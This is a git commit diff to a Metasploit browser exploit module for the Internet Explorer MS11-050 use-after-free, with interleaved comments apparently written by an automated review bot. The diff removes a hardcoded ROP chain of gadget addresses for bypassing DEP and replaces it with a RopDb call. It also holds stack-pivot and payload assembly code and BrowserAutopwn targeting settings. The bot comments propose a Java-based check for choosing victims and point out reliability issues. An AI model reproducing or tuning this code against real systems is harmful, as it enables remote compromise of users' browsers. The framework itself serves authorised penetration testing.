Merge branch 'ms11_050_ropdb_update' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ms11_050_ropdb_update

This commit is contained in:
jvazquez-r7 2012-10-06 14:10:36 +02:00
commit 874fe64343
1 changed files with 12 additions and 48 deletions


@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
# If it's IE 8, then we need .net to bypass ASLR
:vuln_test => %Q|
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
}
|,
:os_name => OperatingSystems::WINDOWS
})
def initialize(info={})
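Review bot: With `:vuln_test` removed, autopwn_info now performs no client-side check at all before BrowserAutopwn selects this module for IE 8, even though the removed comment says the IE 8 path needs an extra module to get past ASLR and the ROP chain later in this commit is built from the 'java' RopDb entry. The old test looked for the .NET CLR, which does not obviously match an msvcr71-based chain, so it was arguably checking the wrong dependency — but replacing it with nothing means an IE 8 client without that dependency gets the exploit fired anyway and, presumably, just crashes. Consider a replacement that checks the real dependency, e.g. `:vuln_test => %Q|if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) { is_vuln = !!(navigator.javaEnabled && navigator.javaEnabled()); }|,` or at least a comment next to `:ua_maxver => "8.0"` stating what IE 8 needs for the chain to work. The enclosing class starts before this hunk.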
@ -46,30 +37,29 @@ class Metasploit3 < Msf::Exploit::Remote
to bypass DEP (Data Execution Prevention).
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'd0c_s4vage', #Discovery, poc
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
'bannedit', #Windows 7
'bannedit' #Windows 7
],
'References' =>
[
['CVE', '2011-1260'],
['OSVDB', '72950'],
['MSB', 'MS11-050'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
@ -185,42 +175,16 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
#In case we're using ROP, initialize it now
code = ''
if mytarget['Rop']
# !mona -m msvcr71 rop
code = [
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c354901, # POP EBX # RETN [msvcr71.dll]
0xffffffff,
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c364802, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].pack("V*")
p = make_nops(44) #Nops
p << "\xeb\x04\xff\xff" #Jmp over the pivot
p << [mytarget.ret].pack('V') #Stack pivot
p << payload.encoded
code << "\x90"*20 #Nops
code << "\xeb\x04\xff\xff" #Jmp over the pivot
code << [mytarget.ret].pack('V') #Stack pivot
rop_payload = generate_rop_payload('java', p)
end
code << payload.encoded
code = (rop_payload) ? rop_payload : payload.encoded
# fill the vtable
vtable = [mytarget['TargetAddr']].pack('V*')
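Review bot: `rop_payload` in `code = (rop_payload) ? rop_payload : payload.encoded` is only assigned inside the `if mytarget['Rop']` branch; Ruby still defines the local (as nil) when the branch is skipped, so this works, but it reads like a latent NameError and is easier to trust written as `rop_payload = nil` before the `if` and `code = rop_payload || payload.encoded`. Separately, the sled grew from `"\x90"*20` to `make_nops(44)` and the chain is now whatever the 'java' RopDb entry emits, while `'Space' => 500` (context in the earlier hunk) is unchanged — worth confirming that chain + 52 bytes (sled, jmp, pivot) + payload still fits what the spray and the `StackAdjustment` assume. The surrounding method starts and ends outside this hunk.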